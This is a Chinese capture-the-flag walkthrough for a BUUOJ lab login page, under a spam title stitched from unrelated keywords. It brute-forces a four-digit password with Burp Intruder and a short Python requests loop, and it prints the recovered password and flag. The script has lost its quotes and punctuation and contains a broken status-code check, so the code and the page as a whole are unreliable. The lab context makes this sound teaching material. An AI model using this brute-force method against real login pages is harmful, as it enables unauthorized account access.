聊城做网站的公司精英,全球有多少亿人口,WordPress主题文本,中国建设银行的网站用户名是什么靶场教程
1.开局页面#xff0c;是个登录界面。2.尝试万能密码#xff0c;发现并不可行#xff0c;提示【用户名错误】。用户名输入admin#xff0c;发现提示密码错误#xff0c;为四位数字。3.那么#xff0c;抓包爆破吧。通过burp进行抓包。4.发送包到 Intruder 进行爆…
靶场教程
1.开局页面是个登录界面。2.尝试万能密码发现并不可行提示【用户名错误】。用户名输入admin发现提示密码错误为四位数字。3.那么抓包爆破吧。通过burp进行抓包。4.发送包到 Intruder 进行爆破。快捷键 Ctrl L3.设置爆破数值进行爆破。在 3 处修改爆破数值099991即可。【注已知爆破密码6490可自定义缩小爆破范围测试】4.开始爆破发现结果。【密码6490】5.获得flag
账号admin
密码6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}方案二
1.通过 python 脚本获取密码。
import time
import requestsurlhttp://f6e13443-89ab-43b2-b355-7efe8190c675.node5.buuoj.cn:81/?usernameadminpasswordfor i in range(6400, 7000):res requests.get(url str(i))print([*] Try : str(i))if 429 in res.status_code:time.sleep(0.5)i i-1continueif res.text ! 密码错误为四位数字。:print(res.text)break2.获取 flag
账号admin
密码6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}
